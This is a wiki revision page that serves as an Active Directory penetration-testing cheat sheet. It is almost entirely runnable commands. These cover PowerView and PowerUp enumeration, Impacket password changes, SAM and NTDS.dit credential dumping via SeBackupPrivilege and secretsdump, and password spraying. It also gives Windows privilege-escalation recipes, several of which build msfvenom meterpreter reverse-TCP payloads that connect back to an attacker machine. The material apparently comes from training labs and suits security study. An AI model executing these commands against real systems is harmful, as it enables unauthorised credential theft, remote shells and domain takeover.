Active Directory: Difference between revisions

From RCATs
No edit summary
Tag: Manual revert
 
(54 intermediate revisions by the same user not shown)
Line 1: Line 1:
<onlyinclude>
== Initial Access ==
=='''Kerberoasting'''==
 
<section begin="impacket" />
=== Impacket ===
===== impacket-smbpasswd =====
<syntaxhighlight lang="powershell">
#impacket-smbpasswd / Change password for vulnerable users.
smbpasswd.py j.doe@192.168.1.11
smbpasswd.py contoso.local/j.doe@DC1 -hashes :fc525c9683e8fe067095ba2ddc971889
smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newpass 'N3wPassw0rd!'
smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newhashes :126502da14a98b58f2c319b81b3a49cb
smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newpass 'N3wPassw0rd!' -altuser administrator -altpass 'Adm1nPassw0rd!'
smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newhashes :126502da14a98b58f2c319b81b3a49cb -altuser CONTOSO/administrator -altpass 'Adm1nPassw0rd!' -admin
smbpasswd.py SRV01/administrator:'Passw0rd!'@10.10.13.37 -newhashes :126502da14a98b58f2c319b81b3a49cb -altuser CONTOSO/SrvAdm -althash 6fe945ead39a7a6a2091001d98a913ab
</syntaxhighlight>
===== impacket-rpcdump =====
<syntaxhighlight lang="powershell">
# when port 135 or 539 is open.
135/tcp  open    msrpc        Microsoft Windows RPC
 
impacket-rpcdump -p 135 10.10.206.21
</syntaxhighlight>
<section end="impacket" />
 
== LOLBAS ==
==== Remote Code Execution ====
{{#lst:Remote Code Execution|remotecodeex}}
==== Runas ====
{{#lst:Runas|runas}}
[[Runas]]
 
== AD-Module ==
<syntaxhighlight lang="powershell">
Import-Module .\Microsoft.ActiveDirectory.Management.dll
</syntaxhighlight>
 
==== PowerShell LocalAccounts Module ====
<syntaxhighlight lang="powershell">
Get-Command -Module Microsoft.PowerShell.LocalAccounts
 
</syntaxhighlight>
 
===== The list below briefly describes what each of these cmdlets is used for: =====
<syntaxhighlight lang="powershell">
Add-LocalGroupMember          # Add a user to the local group
Disable-LocalUser              # Disable a local user account
Enable-LocalUser              # Enable a local user account
Get-LocalGroup                # View local group preferences
Get-LocalGroupMember          # View the list of all local group members
Get-LocalUser                  # View local user account preferences
New-LocalGroup                # Create a new local group
New-LocalUser                  # Create a new local user account
Remove-LocalGroup              # Remove a local group
Remove-LocalGroupMember        # Remove a member from a local group
Remove-LocalUser              # Remove local user account
Rename-LocalGroup              # Rename a local group
Rename-LocalUser              # Rename a local user account
Set-LocalGroup                # Change the settings of a local group
Set-LocalUser                  # Change the account settings of a local user
</syntaxhighlight>
 
==== Example: ====
<syntaxhighlight lang="powershell">
Add-LocalGroupMember -Group "Administrators" -Member "Username"
</syntaxhighlight>
 
=== '''PowerView''' ===
<syntaxhighlight lang="powershell">
# Load PowerView on Disk
./PowerView.ps1
 
# Import PowerView
. .\PowerView.ps1 # dot sourcing
IPMO .\PowerView.ps1 # short cut for Import-Module
Import-Module .\PowerView.ps1 # Import-Module
 
# Load PowerView
Import-Module PowerView
 
# Load PowerView with Cobalt Strike
powershell-import /home/user/directory/of/PowerView.ps1
 
# Check if PowerView has been loaded Successfully
Get-InstalledModule
</syntaxhighlight>
 
==== General PowerView Functions ====
<syntaxhighlight lang="powershell">
Export-PowerViewCSV            #  thread-safe CSV append
Set-MacAttribute                #  Sets MAC attributes for a file based on another file or input (from Powersploit)
Copy-ClonedFile                #  copies a local file to a remote location, matching MAC properties
Get-IPAddress                  #  resolves a hostname to an IP
Test-Server                    #  tests connectivity to a specified server
Convert-NameToSid              #  converts a given user/group name to a security identifier (SID)
Convert-SidToName              #  converts a security identifier (SID) to a group/user name
Convert-NT4toCanonical          #  converts a user/group NT4 name (i.e. dev/john) to canonical format
Get-Proxy                      #  enumerates local proxy settings
Get-PathAcl                    #  get the ACLs for a local/remote file path with optional group recursion
Get-UserProperty                #  returns all properties specified for users, or a set of user:prop names
Get-ComputerProperty            #  returns all properties specified for computers, or a set of computer:prop names
Find-InterestingFile            #  search a local or remote path for files with specific terms in the name
Invoke-CheckLocalAdminAccess    #  check if the current user context has local administrator access to a specified host
Get-DomainSearcher              #  builds a proper ADSI searcher object for a given domain
Get-ObjectAcl                  #  returns the ACLs associated with a specific active directory object
Add-ObjectAcl                  #  adds an ACL to a specified active directory object
Get-LastLoggedOn                #  return the last logged on user for a target host
Get-CachedRDPConnection        #  queries all saved RDP connection entries on a target host
Invoke-ACLScanner              #  enumerate -1000+ modifable ACLs on a specified domain
Get-GUIDMap                    #  returns a hash table of current GUIDs -> display names
Get-DomainSID                  #  return the SID for the specified domain
Invoke-ThreadedFunction        #  helper that wraps threaded invocation for other functions
</syntaxhighlight>
 
==== Net Functions ====
<syntaxhighlight lang="powershell">
Get-NetDomain                  #  gets the name of the current user's domain
Get-NetForest                  #  gets the forest associated with the current user's domain
Get-NetForestDomain            #  gets all domains for the current forest
Get-NetDomainController        #  gets the domain controllers for the current computer's domain
Get-NetUser                    #  returns all user objects, or the user specified (wildcard specifiable)
Add-NetUser                    #  adds a local or domain user
Get-NetComputer                #  gets a list of all current servers in the domain
Get-NetPrinter                  #  gets an array of all current computers objects in a domain
Get-NetOU                      #  gets data for domain organization units
Get-NetSite                    #  gets current sites in a domain
Get-NetSubnet                  #  gets registered subnets for a domain
Get-NetGroup                    #  gets a list of all current groups in a domain
Get-NetGroupMember              #  gets a list of all current users in a specified domain group
Get-NetLocalGroup              #  gets the members of a localgroup on a remote host or hosts
Add-NetGroupUser                #  adds a local or domain user to a local or domain group
Get-NetFileServer              #  get a list of file servers used by current domain users
Get-DFSshare                    #  gets a list of all distribute file system shares on a domain
Get-NetShare                    #  gets share information for a specified server
Get-NetLoggedon                #  gets users actively logged onto a specified server
Get-NetSession                  #  gets active sessions on a specified server
Get-NetRDPSession              #  gets active RDP sessions for a specified server (like qwinsta)
Get-NetProcess                  #  gets the remote processes and owners on a remote server
Get-UserEvent                  #  returns logon or TGT events from the event log for a specified host
Get-ADObject                    #  takes a domain SID and returns the user, group, or computer object associated with it
Set-ADObject                    #  takes a SID, name, or SamAccountName to query for a specified  domain object, and then sets a pecified 'PropertyName' to a specified 'PropertyValue'
 
</syntaxhighlight>
 
==== GPO functions ====
<syntaxhighlight lang="powershell">
Get-GptTmpl                    #  parses a GptTmpl.inf to a custom object
Get-NetGPO                      #  gets all current GPOs for a given domain
Get-NetGPOGroup                #  gets all GPOs in a domain that set "Restricted Groups" on on target machines
Find-GPOLocation                #  takes a user/group and makes machines they have effectiverights over through GPO enumeration and correlation
Find-GPOComputerAdmin          #  takes a computer and determines who has admin rights over itthrough GPO enumeration
Get-DomainPolicy                #  returns the default domain or DC policy
</syntaxhighlight>
 
==== User-Hunting Functions ====
<syntaxhighlight lang="powershell">
Invoke-UserHunter              #  finds machines on the local domain where specified users are logged into, and can optionally check if the current user has local admin access to found machines
Invoke-StealthUserHunter        #  finds all file servers utilizes in user HomeDirectories, and checks the sessions one each file server, hunting for particular users
Invoke-ProcessHunter            #  hunts for processes with a specific name or owned by a specific user on domain machines
Invoke-UserEventHunter          #  hunts for user logon events in domain controller event logs
 
</syntaxhighlight>
 
==== Domain Trust Functions ====
<syntaxhighlight lang="powershell">
Get-NetDomainTrust              #  gets all trusts for the current user's domain
Get-NetForestTrust              #  gets all trusts for the forest associated with the current user's domain
Find-ForeignUser                #  enumerates users who are in groups outside of their principal domain
Find-ForeignGroup              #  enumerates all the members of a domain's groups and finds users that are outside of the queried domain
Invoke-MapDomainTrust          #  try to build a relational mapping of all domain trusts
 
</syntaxhighlight>
 
==== Meta Functions ====
<syntaxhighlight lang="powershell">
Invoke-ShareFinder              #  finds (non-standard) shares on hosts in the local domain
Invoke-FileFinder              #  finds potentially sensitive files on hosts in the local domain
Find-LocalAdminAccess          #  finds machines on the domain that the current user has local admin access to
Find-ManagedSecurityGroups      #  searches for active directory security groups which are managed and identify users who have write access to
                                #  those groups (i.e. the ability to add or remove members)
Find-UserField                  #  searches a user field for a particular term
Find-ComputerField              #  searches a computer field for a particular term
Get-ExploitableSystem          #  finds systems likely vulnerable to common exploits
Invoke-EnumerateLocalAdmin      #  enumerates members of the local Administrators groups across all machines in the domain
 
</syntaxhighlight>
 
== Domain Enumeration ==
 
====== Domain ======
<syntaxhighlight lang="powershell">
# Get current domain
 
Get-NetDomain (PowerView)                                 
Get-ADDomain (ActiveDirectory Module)                     
 
# Get Object of another domain
 
Get-NetDomain -Domain domain.local                       
Get-ADDomain -Identity domain.local                       
 
# Get domain SID for the current domain
 
Get-DomainSID                                             
(Get-ADDomain).DomainSID                                 
 
# Get domain policy for the current domain
 
Get-DomainPolicy                                         
(Get-DomainPolicy)."system access"                       
 
# Get domain policy for another domain
 
(Get-DomainPolicy -domain domain.local)."system access"   
 
# Get domain controllers for the current domain
 
Get-NetDomainController                                 
Get-ADDomainController                                   
 
# Get domain controllers for another domain
 
Get-NetDomainController -Domain domain.local               
Get-ADDomainController -DomainName domain.local -Discover
</syntaxhighlight>
 
====== Net User ======
<syntaxhighlight lang="powershell">
# Get a list of users in the current domain
 
Get-NetUser                                               
Get-NetUser -Username student1                             
Get-NetUser | select -ExpandProperty samaccountname       
Get-ADUser -Filter * -Properties *                         
Get-ADUser -Identity student1 -Properties *               
 
# Get list of all properties for users in the current domain
 
Get-UserProperty
Get-UserProperty -Properties pwdlastset
Get-ADUser -Filter * -Properties * | select -First 1 | Get-Member -MemberType *Property | select Name
Get-ADUser -Filter * -Properties * | select name,@{expression={[datetime]::fromFileTime($_.pwdlastset)}}
 
# Search for a particular string in a user's attributes
 
Find-UserField -SearchField Description -SearchTerm "built"
Get-ADUser -Filter 'Description -like "*built*"' -Properties Description | select name,Description
</syntaxhighlight>
 
====== Net Group ======
<syntaxhighlight lang="powershell">
# Get a list of computers in the current domain
 
Get-NetComputer
Get-NetComputer -OperatingSystem "*Server 2016*"
Get-NetComputer -Ping
Get-NetComputer -FullData
Get-ADComputer -Filter * | select Name Get-ADComputer -Filter 'OperatingSystem -like "*Server 2016*"' -Properties OperatingSystem | select Name,OperatingSystem
Get-ADComputer -Filter * -Properties DNSHostName | %{Test-Connection -Count 1 -ComputerName $_.DNSHostName}
Get-ADComputer -Filter * -Properties *
 
# Get all the groups in the current domain
 
Get-NetGroup
Get-NetGroup -Domain <targetdomain>
Get-NetGroup -FullData
Get-ADGroup -Filter * | select Name
Get-ADGroup -Filter * -Properties *
 
# Get all groups containing the word "admin" in group name
 
Get-NetGroup *admin*
Get-ADGroup -Filter 'Name -like "*admin*"' | select Name
 
# Get all the members of the Domain Admins group
 
Get-NetGroupMember -GroupName "Domain Admins" -Recurse
Get-ADGroupMember -Identity "Domain Admins" -Recursive
Get-NetGroupMember -GroupName "Enterprise Admins" -Domain target.local
 
# Get the group membership for a user
 
Get-NetGroup -UserName "john"
Get-ADPrincipalGroupMembership -Identity student1
 
# List all the local groups on a machine (needs administrator privs on non-dc machines)
 
Get-NetLocalGroup -ComputerName DC01.enumme.local -ListGroups
 
# Get members of all the local groups on a machine (needs administrator privs on non-dc machines)
 
Get-NetLocalGroup -ComputerName DC01.enumme.local -Recurse
</syntaxhighlight>
 
====== Logged Sessions / Users ======
<syntaxhighlight lang="powershell">
# Get actively logged users on a computer (needs local admin rights on the target)
 
Get-NetLoggedon -ComputerName <servername>
 
# Get locally logged users on a computer (needs remote registry on the target - started by-default on server OS)
 
Get-LoggedonLocal -ComputerName DC01.enumme.local
 
# Get the last logged user on a computer (needs administrative rights and remote registry on the target)
 
Get-LastLoggedOn -ComputerName <servername>
</syntaxhighlight>
 
====== Shares ======
<syntaxhighlight lang="powershell">
# Find shares on hosts in current domain
 
Invoke-ShareFinder -Verbose
Invoke-ShareFinder -ExcludeStandard -ExcludePrint -ExcludeIPC -Verbose
 
# Find sensitive files on computers in the domain
 
Invoke-FileFinder -Verbose
 
# Get all fileservers of the domain
 
Get-NetFileServer
</syntaxhighlight>
 
====== GPO ======
<syntaxhighlight lang="powershell">
# Get list of GPO in current domain
 
Get-NetGPO
Get-NetGPO -ComputerName DC01.enumme.local
Get-GPO -All (GroupPolicy module)
Get-GPResultantSetOfPolicy -ReportType Html -Path C:\Users\Administrator\report.html (Provides RSoP)
 
# Enumerate ACLs for all the GPOs
 
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}
 
# Enumerate Restricted Groups from GPO
 
Get-NetGPOGroup -Verbose
 
# Enumerate GPOs where target user or group have interesting permissions
 
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ?{$_.IdentityReference -match "target"}
 
# Membership of the Group "RDPUsers”
 
Get-NetGroupMember -GroupName RDPUsers
 
# Get GPO(s) which use Restricted Groups or groups.xml for interesting users
 
Get-NetGPOGroup
 
# Get users which are in a local group of a machine using GPO
 
Find-GPOComputerAdmin -Computername srv.enumme.local
 
# Get machines where the given user is member of a specific group
 
Find-GPOLocation -UserName john -Verbose
 
# GPO applied on the target OU
 
(Get-NetOU targetmachine -FullData).gplink[LDAP://cn={x-x-x-x-x},cn=policies,cn=system,DC=target,DC=domain,DC=local;0]
Get-NetGPO -ADSpath 'LDAP://cn={x-x-x-x-x},cn=policies,cn=system,DC=target,DC=domain,DC=local'
</syntaxhighlight>
 
====== OU ======
<syntaxhighlight lang="powershell">
# Get OUs in a domain
 
Get-NetOU -FullData
Get-ADOrganizationalUnit -Filter * -Properties *
 
# Get GPO applied on an OU. Read GPOname from gplink attribute from Get-NetOU
 
Get-NetGPO -GPOname "{x-x-x-x-x}"
Get-GPO -Guid x-x-x-x-x (GroupPolicy module)
 
# List all the computers in the target OU
 
Get-NetOU targetcomputer | %{Get-NetComputer -ADSPath $_}
 
 
</syntaxhighlight>
 
====== ACL ======
<syntaxhighlight lang="powershell">
# Get the ACLs associated with the specified object
 
Get-ObjectAcl -SamAccountName john -ResolveGUIDs
Get-ObjectAcl -SamAccountName "users" -ResolveGUIDs -Verbose
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs -Verbose
 
# Get the ACLs associated with the specified prefix to be used for search
 
Get-ObjectAcl -ADSprefix 'CN=Administrator,CN=Users' -Verbose
 
# We can also enumerate ACLs using ActiveDirectory module but without resolving GUIDs
 
(Get-Acl 'AD:\CN=Administrator,CN=Users,DC=domain,DC=local').Access
 
# Get the ACLs associated with the specified LDAP path to be used for search
 
Get-ObjectAcl -ADSpath "LDAP://CN=Domain
Admins,CN=Users,DC=domain,DC=local" -ResolveGUIDs -Verbose
 
# Search for interesting ACEs
 
Invoke-ACLScanner -ResolveGUIDs
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReference -match "target"}
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReference -match "targetgroup"}
 
# Get the ACLs associated with the specified path
 
Get-PathAcl -Path "\\DC01.domain.local\sysvol"
 
</syntaxhighlight>
 
====== Domain Trusts ======
<syntaxhighlight lang="powershell">
# Get a list of all domain trusts for the current domain
 
Get-NetDomainTrust
Get-NetForestDomain -Verbose
Get-NetDomainTrust -Domain fr.k71.test.local
Get-ADTrust
Get-ADTrust -Identity fr.k71.test.local
 
# Get details about the current forest
 
Get-NetForest
Get-NetForest -Forest domain.local
Get-ADForest
Get-ADForest -Identity domain.local
 
# Get all domains in the current forest
 
Get-NetForestDomain
Get-NetForestDomain -Forest domain.local
(Get-ADForest).Domains
 
# Map all the trusts of the domain.local forest
 
Get-NetForestDomain -Verbose | Get-NetDomainTrust
 
# Get all global catalogs for the current forest
 
Get-NetForestCatalog
Get-NetForestCatalog -Forest domain.local
Get-ADForest | select -ExpandProperty GlobalCatalogs
 
# Map trusts of a forest
 
Get-NetForestTrust
Get-NetForestTrust -Forest domain.local
Get-ADTrust -Filter 'msDS-TrustForestTrustInfo -ne "$null"'
 
# List external trusts
 
Get-NetForestDomain -Verbose | Get-NetDomainTrust | ?{$_.TrustType -eq 'External'}
</syntaxhighlight>
 
== Privileges ==
 
==== SeBackupPrivilege ====
 
===== Method 1 =====
<syntaxhighlight lang="powershell">
# On the victim machine.
cd c:\
mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system
 
# From the victim machine to the attack machine.
Download sam
Download system
 
# On the attack machine.
pypykatz registry --sam sam system
</syntaxhighlight>
 
===== Method 2 =====
<syntaxhighlight lang="powershell">
# On the attack machine.
nano rcats.dsh
set context persistent nowriters
add volume c: alias rcats
create
expose %rcats% z:
 
# On the attack machine.
unix2dos rcats.dsh
 
# On the vicitm machine.
cd C:\Temp
upload rcats.dsh
diskshadow /s rcats.dsh
robocopy /b z:\windows\ntds . ntds.dit
 
reg save hklm\system c:\Temp\system
cd C:\Temp
download ntds.dit
download system
 
# On the attack machine.
impacket-secretsdump -ntds ntds.dit -system system local
</syntaxhighlight>
 
===== Method 3 =====
<syntaxhighlight lang="powershell">
# On the vicitm machine.
cd C:\Temp
upload rcats.dsh #create this the same way as method 2 above.
upload SeBackupPrivilegeUtils.dll
upload SeBackupPrivilegeCmdLets.dll
 
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
diskshadow /s rcats.dsh
 
Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\Temp\ntds.dit
reg save hklm\system c:\Temp\system
cd C:\Temp
download ntds.dit
download system
 
# On the attacker machine.
impacket-secretsdump -ntds ntds.dit -system system local
</syntaxhighlight>
 
=='''Privilege Escalation'''==
 
====== Basic Privilege escalation - PowerUp.ps1 ======
<syntaxhighlight lang="powershell">
1. Service Enumeration
Get-ServiceUnquoted                #  returns services with unquoted paths that also have a space in the name
Get-ModifiableServiceFile          #  returns services where the current user can write to the service binary path or its config
Get-ModifiableService              #  returns services the current user can modify
Get-ServiceDetail                  #  returns detailed information about a specified service
 
2. Service Abuse
Invoke-ServiceAbuse                #  modifies a vulnerable service to create a local admin or execute a custom command
Write-ServiceBinary                #  writes out a patched C # service binary that adds a local admin or executes a custom command
Install-ServiceBinary              #  replaces a service binary with one that adds a local admin or executes a custom command
Restore-ServiceBinary              #  restores a replaced service binary with the original executable
 
3. DLL Hijacking
Find-ProcessDLLHijack              #  finds potential DLL hijacking opportunities for currently running processes
Find-PathDLLHijack                  #  finds service %PATH% DLL hijacking opportunities
Write-HijackDll                    #  writes out a hijackable DLL
 
4. Registry Checks
Get-RegistryAlwaysInstallElevated  #  checks if the AlwaysInstallElevated registry key is set
Get-RegistryAutoLogon              #  checks for Autologon credentials in the registry
Get-ModifiableRegistryAutoRun      #  checks for any modifiable binaries/scripts (or their configs) in HKLM autoruns
 
5. Miscellaneous Checks
Get-ModifiableScheduledTaskFile    #  find schtasks with modifiable target files
Get-UnattendedInstallFile          #  finds remaining unattended installation files
Get-Webconfig                      #  checks for any encrypted web.config strings
Get-ApplicationHost                #  checks for encrypted application pool and virtual directory passwords
Get-SiteListPassword                #  retrieves the plaintext passwords for any found McAfee`'s SiteList.xml files
Get-CachedGPPPassword              #  checks for passwords in cached Group Policy Preferences files
 
6. Other Helpers/Meta-Functions
Get-ModifiablePath                  #  tokenizes an input string and returns the files in it the current user can modify
Get-CurrentUserTokenGroupSid        #  returns all SIDs that the current user is a part of, whether they are disabled or not
Add-ServiceDacl                    #  adds a Dacl field to a service object returned by Get-Service
Set-ServiceBinPath                  #  sets the binary path for a service to a specified value through Win32 API methods
Test-ServiceDaclPermission          #  tests one or more passed services or service names against a given permission set
Write-UserAddMSI                    #  write out a MSI installer that prompts for a user to be added
 
7. Check ALL
Invoke-AllChecks                    #  runs all current escalation checks and returns a report
</syntaxhighlight>
 
====== AlwaysInstallElevated ======
<syntaxhighlight lang="powershell">
DETECTION:
## On Windows Machine
 
1. Open command prompt and type: reg query HKLM\Software\Policies\Microsoft\Windows\Installer
2. From the output, notice that “AlwaysInstallElevated” value is 1
 
1. In command prompt type: reg query HKCU\Software\Policies\Microsoft\Windows\Installer
2. From the output, notice that “AlwaysInstallElevated” value is 1
 
EXPLOITATION:
## With Meta-Sploit in Kali
 
1. Open command prompt and type: msfconsole
2. In Metasploit (msf > prompt) type: use multi/handler
3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
5. In Metasploit (msf > prompt) type: run
6. Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f msi -o setup.msi
7. Copy the generated file, setup.msi, to the Windows Machine.
 
## Back on the Windows Machine
 
1. Place ‘setup.msi’ in ‘C:\Temp’.
2. Open command prompt and type: msiexec /quiet /qn /i C:\Temp\setup.msi
3. It is possible to confirm that the user was added to the local administrators group by
typing the following in the command prompt: net localgroup administrators
 
 
</syntaxhighlight>
 
====== Registry ======
<syntaxhighlight lang="powershell">
DETECTION:
# Windows Machine
 
1. Open powershell prompt and type: Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
2. Notice that the output suggests that user belong to “NT AUTHORITY\INTERACTIVE” has “FullContol” permission over the registry key.
 
EXPLOITATION:
# Windows Machine
 
1. Copy ‘C:\Users\User\Desktop\Tools\Source\windows_service.c’ to the Kali VM.
 
# Kali Machine
 
1. Open windows_service.c in a text editor and replace the command used by the system() function to: cmd.exe /k net localgroup administrators user /add
2. Exit the text editor and compile the file by typing the following in the command prompt: x86_64-w64-mingw32-gcc windows_service.c -o x.exe (NOTE: if this is not installed, use 'sudo apt install gcc-mingw-w64')
3. Copy the generated file x.exe, to the Windows VM.
 
# Windows Machine
 
1. Place x.exe in ‘C:\Temp’.
2. Open command prompt at type: reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
3. In the command prompt type: sc start regsvc
4. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
</syntaxhighlight>
 
====== Exec Path ======
<syntaxhighlight lang="powershell">
DETECTION:
# Windows Machine
 
1. Open command prompt and type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\File Permissions Service"
2. Notice that the “Everyone” user group has “FILE_ALL_ACCESS” permission on the filepermservice.exe file.
 
EXPLOITATION:
# Windows Machine
 
1. Open command prompt and type: copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"
2. In command prompt type: sc start filepermsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
</syntaxhighlight>
 
====== Startup Applications ======
<syntaxhighlight lang="powershell">
DETECTION:
# Windows Machine
 
1. Open command prompt and type: icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
2. From the output notice that the “BUILTIN\Users” group has full access ‘(F)’ to the directory.
 
EXPLOITATION:
# Kali Machine
 
1. Open command prompt and type: msfconsole
2. In Metasploit (msf > prompt) type: use multi/handler
3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
5. In Metasploit (msf > prompt) type: run
6. Open another command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali VM IP Address] -f exe -o x.exe
7. Copy the generated file, x.exe, to the Windows VM. Windows VM
8. Place x.exe in “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”.
9. Logoff.
10. Login with the administrator account credentials. Kali VM
11. Wait for a session to be created, it may take a few seconds.
12. In Meterpreter(meterpreter > prompt) type: getuid
13. From the output, notice the user is “User-PC\Admin”
</syntaxhighlight>
 
====== DLL Hijacking ======
<syntaxhighlight lang="powershell">
DETECTION:
# Windows Machine
 
1. Open the Tools folder that is located on the desktop and then go the Process Monitor folder.
2. In reality, executables would be copied from the victim’s host over to the attacker’s host for analysis during run time. Alternatively, the same software can be installed on the attacker’s host for analysis, in case they can obtain it. To simulate this, right click on Procmon.exe and select ‘Run as administrator’ from the menu.
3. In procmon, select "filter". From the left-most drop down menu, select ‘Process Name’.
4. In the input box on the same line type: dllhijackservice.exe
5. Make sure the line reads “Process Name is dllhijackservice.exe then Include” and click on the ‘Add’ button, then ‘Apply’ and lastly on ‘OK’.
6. Next, select from the left-most drop down menu ‘Result’.
7. In the input box on the same line type: NAME NOT FOUND
8. Make sure the line reads “Result is NAME NOT FOUND then Include” and click on the ‘Add’ button, then ‘Apply’ and lastly on ‘OK’.
9. Open command prompt and type: sc start dllsvc
10. Scroll to the bottom of the window. One of the highlighted results shows that the service tried to execute ‘C:\Temp\hijackme.dll’ yet it could not do that as the file was not found. Note that ‘C:\Temp’ is a writable location.
 
EXPLOITATION:
# Windows Machine
 
1. Copy ‘C:\Users\User\Desktop\Tools\Source\windows_dll.c’ to the Kali VM.
 
# Kali Machine
 
1. Open windows_dll.c in a text editor and replace the command used by the system() function to: cmd.exe /k net localgroup administrators user /add
2. Exit the text editor and compile the file by typing the following in the command prompt: x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll
3. Copy the generated file hijackme.dll, to the Windows VM. Windows VM
4. Place hijackme.dll in ‘C:\Temp’.
5. Open command prompt and type: sc stop dllsvc & sc start dllsvc
6. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
</syntaxhighlight>
 
====== BinPath ======
<syntaxhighlight lang="powershell">
DETECTION:
# Windows Machine
 
1. Open command prompt and type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc daclsvc
2. Notice that the output suggests that the user “User-PC\User” has the “SERVICE_CHANGE_CONFIG” permission.
 
EXPLOITATION:
# Windows Machine
 
1. In command prompt type: sc config daclsvc binpath= "net localgroup administrators user /add"
2. In command prompt type: sc start daclsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
</syntaxhighlight>
 
====== Unquoted Service Paths ======
<syntaxhighlight lang="powershell">
DETECTION:
# Windows Machine
 
1. Open command prompt and type: sc qc unquotedsvc
2. Notice that the “BINARY_PATH_NAME” field displays a path that is not confined between quotes.
 
EXPLOITATION:
# Kali Machine
 
1. Open command prompt and type: msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
2. Copy the generated file, common.exe, to the Windows VM.
 
# Windows Machine
 
1. Place common.exe in ‘C:\Program Files\Unquoted Path Service’.
2. Open command prompt and type: sc start unquotedsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
</syntaxhighlight>
 
====== Hot-Potato ======
<syntaxhighlight lang="powershell">
EXPLOITATION:
# Windows Machine
 
1. In command prompt type: powershell.exe -nop -ep bypass
2. In Power Shell prompt type: Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1
3. In Power Shell prompt type: Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"
4. To confirm that the attack was successful, in Power Shell prompt type: net localgroup administrators
</syntaxhighlight>
 
====== Configuration Files ======
<syntaxhighlight lang="powershell">
EXPLOITATION:
# Windows Machine
 
1. Open command prompt and type: notepad C:\Windows\Panther\Unattend.xml
2. Scroll down to the "Password" property and copy the base64 string that is confined between the "Value" tags underneath it.
 
# Kali Machine
 
1. In a terminal, type: echo [copied base64] | base64 -d
2. Notice the cleartext password
</syntaxhighlight>
 
====== Memory ======
<syntaxhighlight lang="powershell">
EXPLOITATION:
# Kali Machine
 
1. Open command prompt and type: msfconsole
2. In Metasploit (msf > prompt) type: use auxiliary/server/capture/http_basic
3. In Metasploit (msf > prompt) type: set uripath x
4. In Metasploit (msf > prompt) type: run
 
# Windows Machine
 
1. Open Internet Explorer and browse to: http://[Kali VM IP Address]/x
2. Open command prompt and type: taskmgr
3. In Windows Task Manager, right-click on the “iexplore.exe” in the "Image Name" columnand select “Create Dump File” from the popup menu.
4. Copy the generated file, iexplore.DMP, to the Kali VM.
 
# Kali Machine
 
1. Place 'iexplore.DMP' on the desktop.
2. Open command prompt and type: strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"
3. Select the Copy the Base64 encoded string.
4. In command prompt type: echo -ne [Base64 String] | base64 -d
5. Notice the credentials in the output.
</syntaxhighlight>
 
== User Hunting ==
<syntaxhighlight lang="powershell">
Find-UserField -SearchField Description -SearchTerm "pass"
Find-UserField -SearchField Description -SearchTerm "admin"
Find-UserField -SearchField Description -SearchTerm "manage"
 
Find-LocalAdminAccess -Verbose
 
Invoke-UserHunter
Invoke-UserHunter -CheckAccess
Invoke-UserHunter -Stealth
Invoke-UserHunter -GroupName "RDPUsers"
 
# Monitor/Wait for incoming sessions
Invoke-UserHunter -ComputerName targetserver -Poll 100 -UserName Administrator -Delay 5 -Verbose
 
Invoke-EnumerateLocalAdmin -Verbose
 
. .\Find-WMILocalAdminAccess.ps1
 
. .\Find-PSRemotingLocalAdminAccess.ps1
 
Find-PSRemotingLocalAdminAccess
 
## Enter PSSession
 
# Not Stateful
Enter-PSSession -ComputerName targetcomputer.target.domain.local
# Stateful
$sess = New-Pssession -ComputerName targetcomputer.target.domain.local
Enter-Pssession -session $sess
 
# CHECK POLICY AND BECAREFUL TO NOT LOCK ACCOUNTS
(Get-DomainPolicy)."system access"
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
 
# Use this command to see the last password set of each user in the current domain
 
Get-UserProperty -Properties pwdlastset
</syntaxhighlight>
 
== Network Enumeration ==
<syntaxhighlight lang="powershell">
#Ping Sweep Powershell script for Windows Machines
1..254 | % {"192.168.1.$($_): $(Test-Connection -count 1 -comp 192.168.1.$($_) -quiet)"}
 
 
# Ping Sweep Bash script for Linux machines
for i in $(seq 254); do ping 10.10.10.${i} -c1 -W1 & done | grep from
</syntaxhighlight>
 
== BloodHound ==
